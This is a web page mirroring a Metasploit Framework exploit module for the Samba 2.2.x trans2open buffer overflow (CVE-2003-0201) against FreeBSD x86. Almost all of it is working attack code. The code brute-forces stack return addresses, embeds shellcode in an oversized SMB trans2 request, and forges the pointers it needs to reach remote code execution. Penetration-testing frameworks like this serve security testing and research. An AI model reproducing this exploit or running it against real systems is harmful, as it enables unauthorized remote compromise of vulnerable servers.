Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/samba/trans2open.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Exploit::Brute

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Samba trans2open Overflow (*BSD x86)',

17
        'Description' => %q{

18
          This exploits the buffer overflow found in Samba versions

19
          2.2.0 to 2.2.8. This particular module is capable of

20
          exploiting the flaw on x86 Linux systems that do not

21
          have the noexec stack option set.

22
        },

23
        'Author' => [ 'hdm', 'jduck' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2003-0201' ],

27
          [ 'OSVDB', '4469' ],

28
          [ 'BID', '7294' ],

29
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]

30
        ],

31
        'Privileged' => true,

32
        'Payload' => {

33
          'Space' => 1024,

34
          'BadChars' => "\x00",

35
          'MinNops' => 512,

36
          'StackAdjustment' => -3500

37
        },

38
        'Platform' => 'bsd',

39
        'Arch' => [ ARCH_X86 ],

40
        'Targets' => [

41
          # tested OK - jjd:

42
          # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8

43
          [

44
            'Samba 2.2.x - Bruteforce',

45
            {

46
              'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack

47
              'Offset' => 1055,

48
              'Bruteforce' =>

49
                {

50
                  'Start' => { 'Ret' => 0xbfbffdfc },

51
                  'Stop' => { 'Ret' => 0xbfa00000 },

52
                  'Step' => 256

53
                }

54
            }

55
          ],

56
        ],

57
        'DefaultTarget' => 0,

58
        'DisclosureDate' => '2003-04-07',

59
        'Notes' => {

60
          'AKA' => ['ECHOWRECKER'],

61
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],

62
          'Reliability' => [ REPEATABLE_SESSION, ],

63
          'SideEffects' => [ IOC_IN_LOGS, ]

64
        }

65
      )

66
    )

67


68
    register_options(

69
      [

70
        Opt::RPORT(139)

71
      ]

72
    )

73


74
    deregister_options('SMB::ProtocolVersion')

75
  end

76


77
  def brute_exploit(addrs)

78
    curr_ret = addrs['Ret']

79
    begin

80
      print_status('Trying return address 0x%.8x...' % curr_ret)

81


82
      connect(versions: [1])

83
      smb_login

84


85
      # This value *must* be 1988 to allow findrecv shellcode to work

86
      # XXX: I'm not sure the above comment is true...

87
      pattern = rand_text_english(1988)

88


89
      # See the OSX and Solaris versions of this module for additional

90
      # information.

91


92
      # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2

93
      # (rpmbuild -bp ; edited/reran config.status ; make)

94
      eip_off = target['Offset']

95
      ptr_to_non_zero = target['PtrToNonZero']

96


97
      # Stuff the shellcode into the request

98
      pattern[0, payload.encoded.length] = payload.encoded

99


100
      # We want test true here, so we overwrite conn with a pointer

101
      # to something non-zero.

102
      #

103
      # 222       if (IS_IPC(conn)) {

104
      # 223          return(ERROR(ERRSRV,ERRaccess));

105
      # 224       }

106
      pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

107


108
      # We want to avoid crashing on the following two derefences.

109
      #

110
      # 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)

111
      # 117     {

112
      # 118       int outsize = set_message(outbuf,0,0,True);

113
      # 119       int cmd = CVAL(inbuf,smb_com);

114
      pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')

115
      pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

116


117
      # This stream covers the framepointer and the return address

118
      # pattern[1199, 400] = [curr_ret].pack('N') * 100

119
      pattern[eip_off, 4] = [curr_ret].pack('V')

120


121
      trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"

122
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"

123
      trans << "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"

124
      trans << "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"

125
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

126
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"

127
      trans << pattern

128


129
      # puts "press any key"; $stdin.gets

130


131
      sock.put(trans)

132
      handler

133
      disconnect

134
    rescue EOFError => e

135
      print_error(e.to_s)

136
    rescue StandardError => e

137
      print_error(e.to_s)

138
    end

139
  end

140
end

141


142